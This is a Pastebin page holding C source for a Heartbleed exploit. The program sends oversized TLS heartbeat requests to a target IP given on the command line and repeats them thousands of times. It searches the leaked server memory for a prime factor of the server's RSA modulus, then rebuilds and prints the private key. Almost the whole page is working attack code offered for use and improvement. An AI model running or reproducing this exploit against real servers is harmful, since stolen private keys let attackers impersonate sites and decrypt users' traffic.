Advertisement
opexxx

heartbleed.c

Apr 21st, 2015
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.01 KB | None | 0 0
  1. /* Heartbleed Private Key Exploit.
  2.  * Author: Felipe Osorio Thome.
  3.  * Date: july 1, 2014
  4.  * Brasil, Universidade de Sao Paulo - USP.
  5.  * Instituto de Ciencias Matematicas e Computacao - ICMC.
  6.  *
  7.  * This exploit is very simple. It is the main idea that matters.
  8.  * Feel free to improve it. */
  9.  
  10. #include <stdio.h>
  11. #include <stdlib.h>
  12. #include <string.h>
  13. #include <errno.h>
  14. #include <netdb.h>
  15. #include <sys/socket.h>
  16. #include <openssl/ssl.h>
  17.  
  18. #define DEFAULT_PORT 443
  19. #define DEFAULT_TRIES 10000
  20.  
  21. #define fatal(expression) do{ \
  22.     if(expression) { \
  23.         fprintf(stderr, "%d: %s\n", __LINE__, strerror(errno)); \
  24.         exit(EXIT_FAILURE); \
  25.     } \
  26. } while(0)
  27.  
  28. /* This macros (n2s and s2n) is copied from ssl/ssl_locl.h. */
  29. #define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
  30.         (((unsigned int)(c[1]))    )),c+=2)
  31.  
  32. #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
  33.     c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
  34.  
  35. typedef struct {
  36.   int socket;
  37.   SSL *ssl_handle;
  38.   SSL_CTX *ssl_context;
  39. } CONN;
  40.  
  41. int tcp_connect(char *host, unsigned int port) {
  42.   int sockfd;
  43.   struct sockaddr_in sa;
  44.  
  45.   fatal( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0 );
  46.  
  47.   sa.sin_family = AF_INET;
  48.   sa.sin_port = htons(port);
  49.   sa.sin_addr.s_addr = inet_addr(host);
  50.   memset(&sa.sin_zero, 0, sizeof(sa.sin_zero));
  51.  
  52.   fatal( connect(sockfd, (struct sockaddr *) &sa, sizeof(struct sockaddr)) < 0 );
  53.  
  54.   return sockfd;
  55. }
  56.  
  57. void ssl_init() {
  58.   SSL_library_init();
  59.   SSL_load_error_strings();
  60. }
  61.  
  62. CONN *ssl_connect(char *host, unsigned int port) {
  63.   CONN *c = NULL;
  64.   BIO *sbio = NULL;
  65.  
  66.   fatal( !(c = malloc(sizeof(CONN))) );
  67.  
  68.   c->socket = tcp_connect(host, port);
  69.  
  70.   if( !(c->ssl_context = SSL_CTX_new(SSLv23_client_method())) ) ERR_print_errors_fp (stderr);
  71.   if( !(c->ssl_handle = SSL_new(c->ssl_context)) ) ERR_print_errors_fp (stderr);
  72.  
  73.   sbio = BIO_new_socket(c->socket, BIO_NOCLOSE);
  74.   SSL_set_bio(c->ssl_handle, sbio, sbio);
  75.  
  76.   if( SSL_connect(c->ssl_handle) != 1 ) ERR_print_errors_fp (stderr);
  77.  
  78.   return c;
  79. }
  80.  
  81. void bleed(CONN *c) {
  82.   unsigned char *buf = NULL, *p = NULL;
  83.  
  84.   if( !(buf = OPENSSL_malloc(3)) ) {
  85.     fprintf(stderr, "%d: %s Problem allocating memory.\n", __LINE__, strerror(errno));
  86.   }
  87.   else {
  88.     p = buf;
  89.     *p++ = TLS1_HB_REQUEST;
  90.     s2n(0xffff,p);
  91.  
  92.     ssl3_write_bytes(c->ssl_handle, TLS1_RT_HEARTBEAT, buf, 3);
  93.  
  94.     OPENSSL_free(buf);
  95.   }
  96. }
  97.  
  98. unsigned char *get_data(CONN *c) {
  99.   unsigned char *buf = NULL;
  100.  
  101.   SSL_read(c->ssl_handle, buf, 0);
  102.  
  103.   unsigned char *p = &c->ssl_handle->s3->rrec.data[0], *pl;
  104.   unsigned short hbtype;
  105.   unsigned int payload;
  106.   hbtype = *p++;
  107.   n2s(p, payload);
  108.  
  109.   if(hbtype == TLS1_HB_RESPONSE) {
  110.     fatal( !(buf = OPENSSL_malloc(payload)) );
  111.     memcpy(buf, p, payload);
  112.   }
  113.  
  114.   return buf;
  115. }
  116.  
  117. RSA *gen_key(BIGNUM *n, BIGNUM *e, BIGNUM *p, BIGNUM *q) {
  118.   RSA *rsa_pvtkey = NULL;
  119.   BN_CTX *ctx = NULL;
  120.   BIGNUM *tmp = NULL, *r0 = NULL, *r1 = NULL, *r2 = NULL;
  121.  
  122.   if( !(rsa_pvtkey = RSA_new()) ) goto err;
  123.   if( !(ctx = BN_CTX_new()) ) goto err;
  124.   BN_CTX_start(ctx);
  125.   r0 = BN_CTX_get(ctx);
  126.   r1 = BN_CTX_get(ctx);
  127.   r2 = BN_CTX_get(ctx);
  128.  
  129.   if( !(rsa_pvtkey->n = BN_dup(n)) ) goto err;
  130.   if( !(rsa_pvtkey->e = BN_dup(e)) ) goto err;
  131.   if( !(rsa_pvtkey->p = BN_dup(p)) ) goto err;
  132.   if( !(rsa_pvtkey->q = BN_dup(q)) ) goto err;
  133.   if( !(rsa_pvtkey->d = BN_new()) ) goto err;
  134.   if( !(rsa_pvtkey->dmp1 = BN_new()) ) goto err;
  135.   if( !(rsa_pvtkey->dmq1 = BN_new()) ) goto err;
  136.   if( !(rsa_pvtkey->iqmp = BN_new()) ) goto err;
  137.  
  138.   if(BN_cmp(rsa_pvtkey->p, rsa_pvtkey->q) < 0) {
  139.     tmp = rsa_pvtkey->p;
  140.     rsa_pvtkey->p = rsa_pvtkey->q;
  141.     rsa_pvtkey->q = tmp;
  142.   }
  143.  
  144.   if( !BN_sub(r1, rsa_pvtkey->p, BN_value_one()) ) goto err;
  145.   if( !BN_sub(r2, rsa_pvtkey->q, BN_value_one()) ) goto err;
  146.   if( !BN_mul(r0, r1, r2, ctx) ) goto err;
  147.   if( !BN_mod_inverse(rsa_pvtkey->d, rsa_pvtkey->e, r0, ctx) ) goto err;
  148.  
  149.   if( !BN_mod(rsa_pvtkey->dmp1, rsa_pvtkey->d, r1, ctx) ) goto err;
  150.  
  151.   if( !BN_mod(rsa_pvtkey->dmq1, rsa_pvtkey->d, r2, ctx) ) goto err;
  152.  
  153.   if( !BN_mod_inverse(rsa_pvtkey->iqmp, rsa_pvtkey->q, rsa_pvtkey->p, ctx) ) goto err;
  154.  
  155.   err:
  156.   if(!rsa_pvtkey) {
  157.     fprintf(stderr, "An error occur while creating RSA struct.\n");
  158.   }
  159.   if(ctx) {
  160.     BN_CTX_end(ctx);
  161.     BN_CTX_free(ctx);
  162.   }
  163.  
  164.   return rsa_pvtkey;
  165. }
  166.  
  167. RSA *get_key(CONN *c, unsigned char *data) {
  168.   int i, payload = 65535, prime_size = 64;
  169.   X509 *peer = NULL;
  170.   EVP_PKEY *pkey = NULL;
  171.   RSA *rsa_pubkey = NULL, *rsa_pvtkey = NULL;
  172.   unsigned char *data_inv = NULL;
  173.  
  174.   peer = SSL_get_peer_certificate(c->ssl_handle);
  175.   pkey = X509_get_pubkey(peer);
  176.   rsa_pubkey = pkey->pkey.rsa;
  177.  
  178.   if( !(data_inv = OPENSSL_malloc(payload)) ) goto err;
  179.   for(i = 0; i < payload; i++) {
  180.     data_inv[i] = data[payload - (i + 1)];
  181.   }
  182.  
  183.   BIGNUM *n = rsa_pubkey->n;
  184.   BIGNUM *e = rsa_pubkey->e;
  185.   BIGNUM *prime = BN_new();
  186.   BIGNUM *dv = BN_new();
  187.   BIGNUM *rem = BN_new();
  188.   BN_CTX *ctx = BN_CTX_new();
  189.  
  190.   for(i = 0; i < (payload - prime_size); i++) {
  191.     BN_bin2bn(data_inv + i, prime_size, prime);
  192.  
  193.     if(!BN_is_zero(prime) && !BN_is_one(prime) && BN_cmp(n, prime)) {
  194.       BN_div(dv, rem, n, prime, ctx);
  195.  
  196.       if(BN_is_zero(rem)) {
  197.         rsa_pvtkey = gen_key(n, e, prime, dv);
  198.       }
  199.     }
  200.   }
  201.  
  202.   err:
  203.   if(ctx) BN_CTX_free(ctx);
  204.   if(rem) BN_free(rem);
  205.   if(data_inv) OPENSSL_free(data_inv);
  206.  
  207.   return rsa_pvtkey;
  208. }
  209.  
  210. int main(int argc, char **argv) {
  211.   int i;
  212.   unsigned char *data = NULL;
  213.   RSA *rsa_pvtkey = NULL;
  214.  
  215.   if(argc <= 1) {
  216.     fprintf(stderr, "You need enter the target IP.\n");
  217.     exit(EXIT_FAILURE);
  218.   }
  219.  
  220.   ssl_init();
  221.   CONN *c = ssl_connect(argv[1], DEFAULT_PORT);
  222.  
  223.   for(i = 0; i < DEFAULT_TRIES; i++) {
  224.     bleed(c);
  225.     data = get_data(c);
  226.  
  227.     if(data) {
  228.       rsa_pvtkey = get_key(c, data);
  229.  
  230.       if(rsa_pvtkey) {
  231.         RSA_print_fp(stdout, rsa_pvtkey, 0);
  232.         break;
  233.       }
  234.     }
  235.   }
  236.  
  237.   if(data) OPENSSL_free(data);
  238.   if(rsa_pvtkey) RSA_free(rsa_pvtkey);
  239.   if(c) free(c);
  240.  
  241.   return 0;
  242. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement